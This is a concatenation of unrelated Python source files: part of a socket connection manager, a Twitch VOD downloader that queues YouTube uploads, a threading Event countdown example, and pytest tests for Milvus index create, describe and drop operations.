if conn.status == ConnStatus.Connecting:
if is_activate:
self._check_connect_timeout(conn, now)
elif conn.status == ConnStatus.Connected:
if is_activate:
conn.handler.on_activate(conn.conn_id, now)
if is_check_req:
self._check_req(conn, now)
if is_activate:
self._last_activate_time = now
if is_check_req:
self._last_check_req_time = now
def _check_connect_timeout(self, conn, now):
time_delta = now - conn.start_time
if conn.timeout is not None and conn.timeout > 0 and time_delta.total_seconds() >= conn.timeout:
self._on_connect_timeout(conn)
def _check_req(self, conn, now):
"""
:param conn:
:type conn: Connection
:param now:
:type now: datetime
:return:
"""
req_dict = dict(conn.req_dict.items())
for proto_info, req_time in req_dict.items(): # type: ProtoInfo, datetime
elapsed_time = now - req_time
if elapsed_time.total_seconds() >= self._sync_req_timeout:
self._on_packet(conn, proto_info._asdict(), Err.Timeout.code, Err.Timeout.text, None)
def _thread_func(self):
while True:
if not self.is_alive():
break
self.poll()
def start(self):
"""
Should be called from main thread
:return:
"""
with self._mgr_lock:
with self._lock:
self._use_count += 1
if self._thread is None:
self._create_all()
self._thread = threading.Thread(target=self._thread_func)
self._thread.setDaemon(SysConfig.get_all_thread_daemon())
self._thread.start()
def stop(self):
with self._mgr_lock:
is_quit = False
with self._lock:
self._use_count = max(self._use_count - 1, 0)
is_quit = not self.is_alive()
if is_quit and self._thread is not None:
self._thread.join()
self._close_all()
self._thread = None
def is_alive(self):
with self._lock:
return self._use_count > 0
def do_send(self, conn_id, proto_info, data):
logger.debug('Send: conn_id={}; proto_id={}; serial_no={}; total_len={};'.format(conn_id, proto_info.proto_id,
proto_info.serial_no,
len(data)))
now = datetime.now()
ret_code = RET_OK
msg = ''
conn = self._get_conn(conn_id) # type: Connection
sync_req_rsp = None
if not conn:
logger.debug(
FTLog.make_log_msg('Send fail', conn_id=conn_id, proto_id=proto_info.proto_id, serial_no=proto_info.serial_no,
msg=Err.ConnectionLost.text))
ret_code, msg = RET_ERROR, Err.ConnectionLost.text
else:
sync_req_rsp = conn.sync_req_dict.get(proto_info, None)
if ret_code != RET_OK:
return ret_code, msg
if conn.status != ConnStatus.Connected:
ret_code, msg = RET_ERROR, Err.NotConnected.text
if ret_code != RET_OK:
logger.warning(FTLog.make_log_msg('Send fail', proto_id=proto_info.proto_id, serial_no=proto_info.serial_no,
conn_id=conn_id, msg=msg))
if sync_req_rsp:
sync_req_rsp.ret, sync_req_rsp.msg = RET_ERROR, msg
sync_req_rsp.event.set()
return ret_code, msg
conn.req_dict[proto_info] = now
size = 0
try:
if len(conn.writebuf) > 0:
conn.writebuf.extend(data)
else:
size = conn.sock.send(data)
except Exception as e:
if is_socket_exception_wouldblock(e):
pass
else:
ret_code, msg = RET_ERROR, str(e)
if size > 0 and size < len(data):
conn.writebuf.extend(data[size:])
self._watch_write(conn, True)
if ret_code != RET_OK:
logger.warning(FTLog.make_log_msg('Send error', conn_id=conn_id, msg=msg))
if sync_req_rsp:
sync_req_rsp.ret, sync_req_rsp.msg = RET_ERROR, msg
sync_req_rsp.event.set()
return ret_code, msg
return RET_OK, ''
def send(self, conn_id, data):
"""
:param conn_id:
:param data:
:return:
"""
proto_info = self._parse_req_head_proto_info(data)
def work():
self.do_send(conn_id, proto_info, data)
self._req_queue.put(work)
self._w_sock.send(b'1')
return RET_OK, None
def close(self, conn_id):
def work():
conn = self._get_conn(conn_id) # type: Connection
if not conn:
return
if conn.sock is None:
return
self._watch_read(conn, False)
self._watch_write(conn, False)
conn.sock.close()
conn.sock = None
conn.status = ConnStatus.Closed
for proto_info, sync_req_rsp in conn.sync_req_dict.items(): # type: ProtoInfo, SyncReqRspInfo
sync_req_rsp.ret = RET_ERROR
sync_req_rsp.msg = Err.ConnectionClosed.text
sync_req_rsp.event.set()
self._req_queue.put(work)
self._w_sock.send(b'1')
def _watch_read(self, conn, is_watch):
try:
sel_key = self._selector.get_key(conn.sock)
except KeyError:
return
if is_watch:
new_event = sel_key.events | selectors.EVENT_READ
else:
new_event = sel_key.events & (~selectors.EVENT_READ)
if new_event != 0:
self._selector.modify(conn.sock, new_event, conn)
else:
self._selector.unregister(conn.sock)
def _watch_write(self, conn, is_watch):
try:
sel_key = self._selector.get_key(conn.sock)
except KeyError:
return
if is_watch:
new_event = sel_key.events | selectors.EVENT_WRITE
else:
new_event = sel_key.events & (~selectors.EVENT_WRITE)
if new_event != 0:
self._selector.modify(conn.sock, new_event, conn)
else:
self._selector.unregister(conn.sock)
def sync_query(self, conn_id, req_str):
head_dict = self._parse_req_head(req_str)
proto_info = ProtoInfo(head_dict['proto_id'], head_dict['serial_no'])
rsp_info = SyncReqRspInfo()
def work():
conn = self._get_conn(conn_id) # type: Connection
ret, msg = RET_OK, ''
if not conn:
ret = RET_ERROR
msg = Err.ConnectionLost.text
else:
conn.sync_req_dict[proto_info] = rsp_info
self.do_send(conn_id, proto_info, req_str)
if ret != RET_OK:
rsp_info.ret = ret
rsp_info.msg = msg
rsp_info.event.set()
self._req_queue.put(work)
self._w_sock.send(b'1')
rsp_info.event.wait()
return rsp_info.ret, rsp_info.msg, rsp_info.data
def _parse_req_head(self, req_str):
head_len = get_message_head_len()
req_head_dict = parse_head(req_str[:head_len])
return req_head_dict
def _parse_req_head_proto_info(selfs, req_str):
head_len = get_message_head_len()
proto_info = parse_proto_info(req_str[:head_len])
return proto_info
def _get_conn(self, conn_id):
for sock, sel_key in self._selector.get_map().items():
if sel_key.fileobj == self._r_sock:
continue
conn = sel_key.data
if conn.conn_id == conn_id:
return conn
return None
def _on_read(self, conn):
start_time = time.time()
recv_len = 0
buf_len = 0
packet_count = 0
if conn.status == ConnStatus.Closed:
return
err = None
is_closed = False
try:
data = conn.sock.recv(128 * 1024)
if data == b'':
is_closed = True
else:
conn.readbuf.extend(data)
recv_len = len(data)
buf_len = len(conn.readbuf)
except Exception as e:
if not is_socket_exception_wouldblock(e):
err = str(e)
while len(conn.readbuf) > 0:
head_len = get_message_head_len()
if len(conn.readbuf) < head_len:
break
head_dict = parse_head(conn.readbuf[:head_len])
body_len = head_dict['body_len']
if len(conn.readbuf) < head_len + body_len:
break
rsp_body = conn.readbuf[head_len:head_len+body_len]
del conn.readbuf[:head_len+body_len]
packet_count += 1
self._on_packet(conn, head_dict, Err.Ok.code, '', rsp_body)
if is_closed:
self.close(conn.conn_id)
conn.handler.on_error(conn.conn_id, Err.ConnectionClosed.text)
elif err:
self.close(conn.conn_id)
conn.handler.on_error(conn.conn_id, err)
end_time = time.time()
logger.debug('conn_id={}; elapsed={}; recv_len={}; buf_len={}; packet={};'.format(conn.conn_id, end_time-start_time, recv_len, buf_len, packet_count))
def _on_write(self, conn):
if conn.status == ConnStatus.Closed:
return
elif conn.status == ConnStatus.Connecting:
err = conn.sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
self._watch_write(conn, False)
if err != 0:
conn.handler.on_error(conn.conn_id, errno.errorcode[err])
else:
conn.status = ConnStatus.Connected
conn.handler.on_connected(conn.conn_id)
return
err = None
size = 0
try:
if len(conn.writebuf) > 0:
size = conn.sock.send(conn.writebuf)
except Exception as e:
if not is_socket_exception_wouldblock(e):
err = str(e)
if size > 0:
del conn.writebuf[:size]
if len(conn.writebuf) == 0:
self._watch_write(conn, False)
if err:
self.close(conn.conn_id)
conn.handler.on_error(conn.conn_id, err)
def _on_connect_timeout(self, conn):
conn.handler.on_connect_timeout(conn.conn_id)
def _on_packet(self, conn, head_dict, err_code, msg, rsp_body_data):
"""
:param conn:
:type conn: Connection
:param head_dict:
:param err_code:
:param msg:
:param rsp_body_data:
:return:
"""
proto_info = ProtoInfo(head_dict['proto_id'], head_dict['serial_no'])
rsp_pb = None
if err_code == Err.Ok.code:
ret_decrypt, msg_decrypt, rsp_body = decrypt_rsp_body(rsp_body_data, head_dict, conn.opend_conn_id)
if ret_decrypt == RET_OK:
rsp_pb = binary2pb(rsp_body, head_dict['proto_id'], head_dict['proto_fmt_type'])
else:
err_code = Err.PacketDataErr.code
msg = msg_decrypt
rsp_pb = None
log_msg = 'Recv: conn_id={}; proto_id={}; serial_no={}; data_len={}; msg={};'.format(conn.conn_id,
proto_info.proto_id,
proto_info.serial_no,
len(
rsp_body_data) if rsp_body_data else 0,
msg)
if err_code == Err.Ok.code:
logger.debug(log_msg)
else:
logger.warning(log_msg)
ret_code = RET_OK if err_code == Err.Ok.code else RET_ERROR
sync_rsp_info = conn.sync_req_dict.get(proto_info, None) # type: SyncReqRspInfo
conn.req_dict.pop(proto_info, None)
if sync_rsp_info:
sync_rsp_info.ret, sync_rsp_info.msg, sync_rsp_info.data = ret_code, msg, rsp_pb
sync_rsp_info.event.set()
conn.sync_req_dict.pop(proto_info)
else:
conn.handler.on_packet(conn.conn_id, proto_info, ret_code, msg, rsp_pb)
@staticmethod
def extract_rsp_pb(opend_conn_id, head_dict, rsp_body):
ret, msg, rsp = decrypt_rsp_body(rsp_body, head_dict, opend_conn_id)
if ret == RET_OK:
rsp_pb = binary2pb(rsp_body, head_dict['proto_id'], head_dict['proto_fmt_type'])
else:
rsp_pb = None
return ret, msg, rsp_pb
def set_conn_info(self, conn_id, info):
with self._lock:
conn = self._get_conn(conn_id)
if conn is not None:
conn.opend_conn_id = info.get('conn_id', conn.opend_conn_id)
conn.keep_alive_interval = info.get('keep_alive_interval', conn.keep_alive_interval)
else:
return RET_ERROR, Err.ConnectionLost.text
return RET_OK, ''
|
vodloader_video.py
|
from vodloader_chapters import vodloader_chapters
from threading import Thread
from math import floor
import logging
import os
import datetime
import streamlink
import requests
import json
import pytz
class vodloader_video(object):
def __init__(self, parent, url, twitch_data, backlog=False, quality='best', part=1):
self.parent = parent
self.logger = logging.getLogger(f'vodloader.{self.parent.channel}.video')
self.part = part
self.backlog = backlog
self.quality = quality
self.passed = False
self.upload = self.parent.upload
self.keep = self.parent.keep
self.twitch_data = twitch_data
if backlog:
self.start_absolute = twitch_data['created_at']
self.id = twitch_data['stream_id']
self.vod_id = twitch_data['id']
else:
self.start_absolute = twitch_data['started_at']
self.id = twitch_data['id']
self.start_absolute = pytz.timezone('UTC').localize(datetime.datetime.strptime(self.start_absolute, '%Y-%m-%dT%H:%M:%SZ'))
self.start_absolute = self.start_absolute.astimezone(self.parent.tz)
self.start = datetime.datetime.now()
self.download_url = url
name = self.id
if self.part > 1:
name += f'.p{self.part}'
self.id += f'p{self.part}'
name += '.ts'
self.path = os.path.join(self.parent.download_dir, name)
self.chapters = self.chapters_init(twitch_data)
self.thread = Thread(target=self.buffload_stream, args=(), daemon=True)
self.thread.start()
def chapters_init(self, twitch_data):
if self.backlog:
chapters = self.get_vod_chapters()
else:
chapters = vodloader_chapters(twitch_data['game_name'], twitch_data['title'])
return chapters
def __del__(self):
pass
def get_stream(self, url, quality):
return streamlink.streams(url)[quality]
def buffload_stream(self):
if not self.id in self.parent.status:
self.download_stream()
if self.upload and self.parent.status[self.id] != True:
self.upload_stream()
def download_stream(self, chunk_size=8192, max_length=60*(60*12-15), retry=10):
self.logger.info(f'Downloading stream from {self.download_url} to {self.path}')
stream = self.get_stream(self.download_url, self.quality)
buff = stream.open()
if self.backlog:
seglen = buff.worker.playlist_sequences[0].segment.duration
seq_limit = floor(max_length/seglen) * self.part
if self.part > 1:
buff.close()
stream.start_offset = (self.part - 1) * (max_length - 60 * seglen * (self.part - 1))
buff = stream.open()
error = 0
with open(self.path, 'wb') as f:
data = buff.read(chunk_size)
while data and error < retry:
if self.parent.end:
buff.close()
exit()
try:
f.write(data)
data = buff.read(chunk_size)
except OSError as err:
self.logger.error(err)
error += 1
if self.backlog:
should_pass = buff.worker.playlist_sequence > (seq_limit - 2)
should_close = buff.worker.playlist_sequence > seq_limit
else:
should_pass = (datetime.datetime.now() - self.start).seconds > (max_length-15)
should_close = (datetime.datetime.now() - self.start).seconds > max_length
if should_pass and not self.passed:
self.passed = True
self.logger.info(f'Max length of {max_length} seconds has been exceeded for {self.path}, continuing download in part {self.part+1}')
twitch_data = self.twitch_data.copy()
twitch_data['game_name'] = self.chapters.get_current_game()
twitch_data['title'] = self.chapters.get_current_title()
if self.backlog:
self.parent.backlog_video = vodloader_video(self.parent, self.download_url, twitch_data, backlog=self.backlog, quality=self.quality, part=self.part+1)
else:
self.parent.livestream = vodloader_video(self.parent, self.download_url, twitch_data, backlog=self.backlog, quality=self.quality, part=self.part+1)
if should_close:
buff.close()
break
buff.close()
self.parent.status[self.id] = False
self.parent.status.save()
self.logger.info(f'Finished downloading stream from {self.download_url}')
def upload_stream(self, chunk_size=4194304, retry=3):
self.parent.uploader.queue.append((self.path, self.get_youtube_body(self.parent.chapters_type), self.id, self.keep))
def get_youtube_body(self, chapters=False):
tvid = f'tvid:{self.id}'
if self.part == 1 and self.passed: tvid += f'p{self.part}'
body = {
'snippet': {
'title': self.get_formatted_string(self.parent.uploader.youtube_args['title'], self.start_absolute),
'description': self.get_formatted_string(self.parent.uploader.youtube_args['description'], self.start_absolute),
'tags': [tvid]
},
'status': {
'selfDeclaredMadeForKids': False
}
}
if 'tags' in self.parent.uploader.youtube_args: body['snippet']['tags'] += self.parent.uploader.youtube_args['tags']
if 'categoryId' in self.parent.uploader.youtube_args: body['snippet']['categoryId'] = self.parent.uploader.youtube_args['categoryId']
if 'privacy' in self.parent.uploader.youtube_args: body['status']['privacyStatus'] = self.parent.uploader.youtube_args['privacy']
if not self.backlog:
body['snippet']['tags'] += self.chapters.get_games()
if chapters:
if chapters.lower() == 'games' and self.chapters.get_game_chapters():
body['snippet']['description'] += f'\n\n\n\n{self.chapters.get_game_chapters()}'
if chapters.lower() == 'titles' and self.chapters.get_title_chapters():
body['snippet']['description'] += f'\n\n\n\n{self.chapters.get_title_chapters()}'
if self.part > 1:
body['snippet']['title'] = f'{body["snippet"]["title"]} Part {self.part}'
body['snippet']['title'] = self.filter_string(body['snippet']['title'])
body['snippet']['description'] = self.filter_string(body['snippet']['description'])
return body
@staticmethod
def filter_string(s):
nono_chars = '<>|'
return ''.join([x for x in s if not x in nono_chars])
def get_formatted_string(self, input, date):
output = input.replace('%C', self.parent.channel)
output = output.replace('%i', self.id)
output = output.replace('%g', self.chapters.get_first_game())
output = output.replace('%G', self.chapters.get_current_game())
output = output.replace('%t', self.chapters.get_first_title())
output = output.replace('%t', self.chapters.get_current_title())
output = date.strftime(output)
return output
def get_stream_markers(self, retry=3):
url = f'https://api.twitch.tv/kraken/videos/{self.vod_id}/markers?api_version=5&client_id={self.parent.twitch.app_id}'
for i in range(retry):
r = requests.get(url)
if r.status_code == 200:
return json.loads(r.content)
return None
def get_video(self, retry=3):
url = f'https://api.twitch.tv/kraken/videos/{self.vod_id}?api_version=5&client_id={self.parent.twitch.app_id}'
for i in range(retry):
r = requests.get(url)
if r.status_code == 200:
return json.loads(r.content)
return None
def get_vod_chapters(self):
video = self.get_video()
chapters = vodloader_chapters(video['game'], video['title'])
offset = 0
response = self.get_stream_markers()
if 'markers' in response and 'game_changes' in response['markers'] and response['markers']['game_changes']:
for marker in response['markers']['game_changes']:
offset += marker['time']
chapters.timestamps.append((chapters.get_timestamp_from_sec(offset), marker['label'], video['title']))
return chapters
|
02_islaunch_thread.py
|
from threading import Thread, Event
import time
# Code to execute in an independent thread
def countdown(n, started_evt):
time.sleep(10)
print('countdown starting')
# relieve the event
started_evt.set()
while n > 0:
print('T-minus', n)
n -= 1
time.sleep(5)
# Create the event object that will be used to signal startup
started_evt = Event()
# Launch the thread and pass the startup event
print('Launching countdown')
t = Thread(target=countdown, args=(10,started_evt))
t.start()
# Wait for the thread to start, equals block the main thread
started_evt.wait()
print('countdown is running')
|
test_index.py
|
"""
For testing index operations, including `create_index`, `describe_index` and `drop_index` interfaces
"""
import logging
import pytest
import time
import pdb
import threading
from multiprocessing import Pool, Process
import numpy
import sklearn.preprocessing
from milvus import Milvus, IndexType, MetricType
from utils import *
nb = 10000
dim = 128
index_file_size = 10
vectors = gen_vectors(nb, dim)
vectors = sklearn.preprocessing.normalize(vectors, axis=1, norm='l2')
vectors = vectors.tolist()
BUILD_TIMEOUT = 60
nprobe = 1
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_index_params()
)
def get_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, table, get_index_params):
'''
target: test create index interface
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_params)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, table):
'''
target: test create index without connection
method: create table and add vectors in it, check if added successfully
expected: raise exception
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(table, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, table, get_index_params):
'''
target: test create index interface, search with more query vectors
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_params)
logging.getLogger().info(connect.describe_index(table))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
status, result = connect.search_vectors(table, top_k, nprobe, query_vecs)
assert status.OK()
assert len(result) == len(query_vecs)
logging.getLogger().info(result)
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, table, args):
'''
target: test create index interface with multiprocess
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(table, vectors)
def build(connect):
status = connect.create_index(table)
assert status.OK()
process_num = 8
processes = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = Milvus()
m.connect(uri=uri)
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(table, top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multitable(self, connect, args):
'''
target: test create index interface with multiprocess
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
table = []
j = 0
while j < (process_num*loop_num):
table_name = gen_unique_str("test_create_index_multiprocessing")
table.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_table(param)
j = j + 1
def create_index():
i = 0
while i < loop_num:
# assert connect.has_table(table[ids*process_num+i])
status, ids = connect.add_vectors(table[ids*process_num+i], vectors)
status = connect.create_index(table[ids*process_num+i])
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(table[ids*process_num+i], top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = Milvus()
m.connect(uri=uri)
ids = i
p = Process(target=create_index, args=(m,ids))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_table_not_existed(self, connect):
'''
target: test create index interface when table name not existed
method: create table and add vectors in it, create index
, make sure the table name not in index
expected: return code not equals to 0, create index failed
'''
table_name = gen_unique_str(self.__class__.__name__)
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(table_name, index_param)
assert not status.OK()
def test_create_index_table_None(self, connect):
'''
target: test create index interface when table name is None
method: create table and add vectors in it, create index with an table_name: None
expected: return code not equals to 0, create index failed
'''
table_name = None
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
with pytest.raises(Exception) as e:
status = connect.create_index(table_name, index_param)
def test_create_index_no_vectors(self, connect, table):
'''
target: test create index interface when there is no vectors in table
method: create table and add no vectors in it, and then create index
expected: return code equals to 0
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(table, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, table, get_simple_index_params):
'''
target: test create index interface when there is no vectors in table, and does not affect the subsequent process
method: create table and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index_params
status = connect.create_index(table, index_param)
status, ids = connect.add_vectors(table, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, table, get_simple_index_params):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
status, ids = connect.add_vectors(table, vectors)
index_param = get_simple_index_params
status = connect.create_index(table, index_param)
status = connect.create_index(table, index_param)
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(table, top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, table):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = 16384
status, ids = connect.add_vectors(table, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
index_params = [{"index_type": index_type_1, "nlist": nlist}, {"index_type": index_type_2, "nlist": nlist}]
logging.getLogger().info(index_params)
for index_param in index_params:
status = connect.create_index(table, index_param)
assert status.OK()
status, result = connect.describe_index(table)
assert result._nlist == nlist
assert result._table_name == table
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, table, get_index_params):
'''
target: test describe index interface
method: create table and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_params)
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == index_params["nlist"]
assert result._table_name == table
assert result._index_type == index_params["index_type"]
def test_describe_and_drop_index_multi_tables(self, connect, get_simple_index_params):
'''
target: test create, describe and drop index interface with multiple tables of L2
method: create tables and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(10):
table_name = gen_unique_str()
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_table(param)
index_params = get_simple_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table_name=table_name, records=vectors)
status = connect.create_index(table_name, index_params)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(table_list[i])
logging.getLogger().info(result)
assert result._nlist == index_params["nlist"]
assert result._table_name == table_list[i]
assert result._index_type == index_params["index_type"]
for i in range(10):
status = connect.drop_index(table_list[i])
assert status.OK()
status, result = connect.describe_index(table_list[i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[i]
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_describe_index_without_connect(self, dis_connect, table):
'''
target: test describe index without connection
method: describe index, and check if describe successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.describe_index(table)
def test_describe_index_table_not_existed(self, connect):
'''
target: test describe index interface when table name not existed
method: create table and add vectors in it, create index
, make sure the table name not in index
expected: return code not equals to 0, describe index failed
'''
table_name = gen_unique_str(self.__class__.__name__)
status, result = connect.describe_index(table_name)
assert not status.OK()
def test_describe_index_table_None(self, connect):
'''
target: test describe index interface when table name is None
method: create table and add vectors in it, create index with an table_name: None
expected: return code not equals to 0, describe index failed
'''
table_name = None
with pytest.raises(Exception) as e:
status = connect.describe_index(table_name)
def test_describe_index_not_create(self, connect, table):
'''
target: test describe index interface when index not created
method: create table and add vectors in it, create index
, make sure the table name not in index
expected: return code not equals to 0, describe index failed
'''
status, ids = connect.add_vectors(table, vectors)
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert status.OK()
# assert result._nlist == index_params["nlist"]
# assert result._table_name == table
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, table, get_index_params):
'''
target: test drop index interface
method: create table and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_index_params
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_param)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
status = connect.drop_index(table)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table
assert result._index_type == IndexType.FLAT
def test_drop_index_repeatly(self, connect, table, get_index_params):
'''
target: test drop index repeatly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_index_params
status, ids = connect.add_vectors(table, vectors)
status = connect.create_index(table, index_param)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
status = connect.drop_index(table)
assert status.OK()
status = connect.drop_index(table)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_without_connect(self, dis_connect, table):
'''
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.drop_index(table)
def test_drop_index_table_not_existed(self, connect):
'''
target: test drop index interface when table name not existed
method: create table and add vectors in it, create index
, make sure the table name not in index, and then drop it
expected: return code not equals to 0, drop index failed
'''
table_name = gen_unique_str(self.__class__.__name__)
status = connect.drop_index(table_name)
assert not status.OK()
def test_drop_index_table_None(self, connect):
'''
target: test drop index interface when table name is None
method: create table and add vectors in it, create index with an table_name: None
expected: return code not equals to 0, drop index failed
'''
table_name = None
with pytest.raises(Exception) as e:
status = connect.drop_index(table_name)
def test_drop_index_table_not_create(self, connect, table):
'''
target: test drop index interface when index not created
method: create table and add vectors in it, create index
expected: return code not equals to 0, drop index failed
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status, ids = connect.add_vectors(table, vectors)
status, result = connect.describe_index(table)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(table)
logging.getLogger().info(status)
assert status.OK()
def test_create_drop_index_repeatly(self, connect, table, get_simple_index_params):
'''
target: test create / drop index repeatly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_params = get_simple_index_params
status, ids = connect.add_vectors(table, vectors)
for i in range(2):
status = connect.create_index(table, index_params)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
status = connect.drop_index(table)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, table):
'''
target: test create / drop index repeatly, use the different index params
method: create index, drop index, four times, each tme use different index_params to create index
expected: return code 0
'''
nlist = 16384
index_params = [{"index_type": IndexType.IVFLAT, "nlist": nlist}, {"index_type": IndexType.IVF_SQ8, "nlist": nlist}]
status, ids = connect.add_vectors(table, vectors)
for i in range(2):
status = connect.create_index(table, index_params[i])
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
status = connect.drop_index(table)
assert status.OK()
status, result = connect.describe_index(table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table
assert result._index_type == IndexType.FLAT
class TestIndexIP:
@pytest.fixture(
scope="function",
params=gen_index_params()
)
def get_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ip_table, get_index_params):
'''
target: test create index interface
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, ip_table):
'''
target: test create index without connection
method: create table and add vectors in it, check if added successfully
expected: raise exception
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(ip_table, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ip_table, get_index_params):
'''
target: test create index interface, search with more query vectors
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
assert status.OK()
logging.getLogger().info(connect.describe_index(ip_table))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
